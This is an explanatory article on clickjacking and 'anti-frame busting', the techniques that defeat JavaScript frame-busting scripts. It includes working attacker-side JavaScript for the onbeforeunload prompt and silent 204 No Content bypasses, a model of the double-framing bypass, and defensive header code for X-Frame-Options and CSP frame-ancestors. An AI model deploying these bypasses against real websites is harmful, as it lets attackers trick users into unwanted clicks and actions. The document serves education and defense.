Anti-Frame Busting - Dismissing Protection Scripts


Clickjacking was first described in 2002 and given its name in 2008, and it was soon clear that dedicated security measures were needed. Demonstrated attacks could switch on a user's webcam, steal session cookies (cookiejacking) and trick users into approving bank transfers, all while the victim believed they were clicking on something harmless. Because the attack is invisible to the user, the protection had to hold up without relying on user vigilance. The first widely deployed countermeasure was frame busting, a solution that attackers soon learned to circumvent. This article looks at some of the techniques used to bypass frame busting, referred to here as anti-frame busting.


Frame busting is a JavaScript technique that prevents a web page from being displayed inside a frame on an attacker's site. Developers had to include the script in every page they did not want framed, whether by an external attacker or by another site of their own. The typical code uses a conditional statement to check whether the page is running inside a frame by looking at 'parent.location' (or 'top.location'); if it is, the script navigates the enclosing window to the page itself, which removes the attacker's page and leaves the legitimate page on top: 'parent.location = self.location'.
Simple as it may seem, this defense was not enough and was soon bypassed, leaving users and organizations at the mercy of attackers who could do as they pleased with their accounts, webcams and computers. We now look at some of the techniques attackers use to circumvent frame busting.


OnBeforeUnload event
The onbeforeunload handler lets a page ask the user to confirm or cancel a navigation away from it. In this attack the handler is registered on the attacker's top-level page, not on the framed page: when the framed victim's frame-busting code assigns 'top.location', the attacker's page is about to be unloaded and its handler runs. The handler returns a string that prompts the user to act in the attacker's favour. A typical prompt would read: 'Are you sure you want to discard all your changes on this page?' with Cancel/OK buttons. Most users do not want to lose unsaved work and press Cancel, which aborts the navigation and thereby defeats the frame-busting script that was meant to protect them. This anti-frame busting technique is as stealthy as clickjacking itself, because users are tricked into switching off their own protection. Current browsers ignore the custom string and show a generic "leave this page?" dialog instead, but pressing Cancel still stops the navigation, so the trick now relies on that generic prompt.
OnBeforeUnload event using 204 ‘No Content’
In the first technique the attacker asks the user, politely and stealthily, to cancel the navigation that would bust the frame. That is not always necessary. The attacker can again register an onbeforeunload handler on the top-level page, but this time use it to redirect the browser to a URL that answers with HTTP 204 'No Content'. A 204 response tells the browser there is nothing to render, so the browser abandons the pending navigation (the one started by the frame-busting code) and stays on the attacker's page without prompting the user. Chrome, Firefox, and Internet Explorer 7 and 8 allowed attackers to bypass frame busting this way when the handler repeatedly redirected the top window to a URL responding with 204. The frame-busting attempt is silently discarded and the user does not realize they are under attack.
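The attacker-side code for both onbeforeunload bypasses (the prompt variant from the previous section and the silent 204 variant described here), written as an added example for this article and not taken from the original text. It follows the technique published by Rydstedt, Bursztein, Boneh and Jackson in "Busting Frame Busting" (2010). The window object is passed in as a parameter so the same logic can be exercised outside a browser; the function names, the '/no-content' path and the polling interval are assumptions made for the example.

```javascript
// Attacker-side pieces of the onbeforeunload bypasses. Added example, not
// article code. `win` is the attacker's TOP-LEVEL window object, passed in so
// the logic can also be exercised under Node.js with a stand-in object.

// Variant 1: prompt the user. Returning a string from onbeforeunload asks the
// browser to show a confirm dialog; pressing Cancel aborts the navigation that
// the framed victim's buster started. Modern browsers ignore the custom text
// and show a generic "leave this page?" dialog, but Cancel still stops it.
function installPromptBuster(win, message) {
  win.onbeforeunload = function () {
    return message;
  };
}

// Variant 2: no prompt. Count unload attempts and supersede each one with a
// navigation of the top window to a URL that answers 204 No Content.
function installNoContentBuster(win, noContentUrl, intervalMs = 1) {
  const state = { pendingUnloads: 0, redirects: 0 };
  win.onbeforeunload = function () {
    state.pendingUnloads++; // fired when the victim assigns top.location
  };
  const timer = setInterval(
    () => noContentTick(state, win, noContentUrl),
    intervalMs
  );
  return { state, stop: () => clearInterval(timer) };
}

// One polling step. The counter is decremented by two because the redirect
// issued here fires onbeforeunload once more, bringing it back to zero.
// Returns true when a redirect was issued, false when nothing was pending.
function noContentTick(state, win, noContentUrl) {
  if (state.pendingUnloads <= 0) return false;
  state.pendingUnloads -= 2;
  state.redirects++;
  win.top.location = noContentUrl; // 204: nothing to render, page stays put
  return true;
}

// Server side: the handler behind noContentUrl, in Node http (req, res) style.
// Wire it with: require('http').createServer(noContentHandler).listen(8080)
function noContentHandler(req, res) {
  res.writeHead(204); // No Content, no body
  res.end();
}

// In the browser the attacker's top-level page installs the silent variant:
if (typeof window !== 'undefined') {
  installNoContentBuster(window, '/no-content');
}
```

The 204 URL must be served from the attacker's own site, since the handler navigates the attacker's top window to it; any origin would do, but a same-site path keeps the request cheap enough to win the race against the victim's navigation.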
Double framing
The frame-busting example above navigates via 'parent': it checks whether the page is framed and then sets 'parent.location = self.location' to replace the attacker's page with the legitimate, unframed one. This works as long as the attacker uses a single frame, so that parent is the top-level window. A more sophisticated attacker encloses the victim page in two frames. Now 'parent' refers to the attacker's inner frame rather than the top window, and assigning its location is refused by all common browsers as a violation of the descendant frame navigation policy: a frame may navigate its own descendants, same-origin frames and the top-level window, but not an intermediate ancestor from another origin. The refused assignment throws a security error, the frame-busting script stops, and the user is clickjacked without noticing. Scripts that navigate via 'top.location' instead are not affected by this particular trick, although they remain exposed to the onbeforeunload bypasses above.
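To make the double-framing failure concrete, here is a small model of a frame tree together with the navigation rule browsers apply, added to this article as an example and not part of the original text. The Frame class, the canNavigate() function, the origins https://attacker.example and https://bank.example and the buster function names are assumptions made for the example; it runs under Node.js and shows the 'parent.location' buster from the frame-busting section succeeding under single framing and being blocked under double framing, while a 'top.location' buster succeeds in both cases.

```javascript
// Model of a browser frame tree and the descendant frame-navigation policy.
// Added example: Frame, canNavigate() and the buster functions are a
// simplification written for this article, not browser or article code.

class Frame {
  constructor(name, origin, parent = null) {
    this.name = name;
    this.origin = origin;
    this.parent = parent; // null for the top-level window
    this.location = origin + '/' + name;
  }
  get top() { // walk up to the top-level window
    let f = this;
    while (f.parent) f = f.parent;
    return f;
  }
}

// "Allowed to navigate" under the descendant policy: source may navigate
// target if they are the same frame or the same origin, if target is the
// top-level window source lives in, or if some ancestor of target shares
// source's origin (which is how a frame may navigate its own descendants).
function canNavigate(source, target) {
  if (source === target || source.origin === target.origin) return true;
  if (target === source.top) return true;
  for (let f = target.parent; f; f = f.parent) {
    if (f.origin === source.origin) return true;
  }
  return false;
}

// Assigning target.location from source. In a real browser a refused
// assignment throws a SecurityError, which aborts the buster script.
function navigate(source, target, url) {
  if (!canNavigate(source, target)) return 'blocked';
  target.location = url;
  return 'navigated';
}

// The article's classic buster: if framed, parent.location = self.location.
function bustViaParent(frame) {
  if (frame.parent === null) return 'not framed';
  return navigate(frame, frame.parent, frame.location);
}

// The sturdier variant: if framed, top.location = self.location.
function bustViaTop(frame) {
  if (frame.top === frame) return 'not framed';
  return navigate(frame, frame.top, frame.location);
}

// Attacker page -> (depth - 1) intermediate attacker frames -> victim page.
function scenario(depth) {
  const top = new Frame('evil', 'https://attacker.example');
  let holder = top;
  for (let i = 1; i < depth; i++) {
    holder = new Frame('inner' + i, 'https://attacker.example', holder);
  }
  const victim = new Frame('account', 'https://bank.example', holder);
  return { top, victim };
}

// Run both busters under single and double framing and report the outcome.
function compareBusters() {
  const results = {};
  for (const [label, depth] of [['single', 1], ['double', 2]]) {
    const a = scenario(depth);
    const b = scenario(depth);
    results[label] = {
      viaParent: bustViaParent(a.victim),
      viaTop: bustViaTop(b.victim),
      topLocationAfterViaTop: b.top.location,
    };
  }
  return results;
}

console.log(JSON.stringify(compareBusters(), null, 2));
```

The model deliberately returns 'blocked' where a browser would throw; the practical consequence is the same, because nothing after the throwing line runs, so a buster that wanted to fall back to 'top.location' on the next line never gets there.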


Anti-frame busting showed that JavaScript alone cannot reliably protect users and organizations from clickjacking, and that stronger, browser-enforced methods were needed. This led to the introduction of HTTP response headers: first X-Frame-Options (DENY or SAMEORIGIN), then the Content-Security-Policy frame-ancestors directive, which can also express an allow list of framing origins. Because the browser applies these headers before any script in the page runs, none of the bypasses above apply to them.
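As an added example of the header-based defense (not code from the article), the following function builds the anti-framing headers a server should attach to every HTML response. The function name, the "'self'" marker and the partner origin used in the usage note are assumptions; the mapping reflects that X-Frame-Options can only say DENY or SAMEORIGIN, so an allow list of other origins has to be expressed with frame-ancestors alone.

```javascript
// Anti-framing response headers. Added example; antiFramingHeaders() is a
// helper written for this article, not part of any framework.
// allowedAncestors: [] (nobody may frame), ["'self'"] (same origin only),
// or a list such as ["'self'", 'https://partner.example'].
function antiFramingHeaders(allowedAncestors = []) {
  // Nobody may frame the page: both headers agree.
  if (allowedAncestors.length === 0) {
    return {
      'X-Frame-Options': 'DENY',
      'Content-Security-Policy': "frame-ancestors 'none'",
    };
  }
  // Only the page's own origin may frame it: both headers agree.
  if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    return {
      'X-Frame-Options': 'SAMEORIGIN',
      'Content-Security-Policy': "frame-ancestors 'self'",
    };
  }
  // An allow list of other origins: only CSP can express it. The old
  // X-Frame-Options ALLOW-FROM took a single origin and is no longer
  // supported, so it is omitted; browsers that understand frame-ancestors
  // ignore X-Frame-Options when both are present anyway.
  for (const source of allowedAncestors) {
    if (source !== "'self'" && !/^https?:\/\/[^\s;,']+$/.test(source)) {
      throw new Error('frame-ancestors source must be a scheme://host origin: ' + source);
    }
  }
  return {
    'Content-Security-Policy': 'frame-ancestors ' + allowedAncestors.join(' '),
  };
}

console.log(antiFramingHeaders());
console.log(antiFramingHeaders(["'self'", 'https://partner.example']));
```

With Node's http module the headers are emitted as res.setHeader(name, value) for each entry before the body is written; the same map can be handed to any web framework's response object.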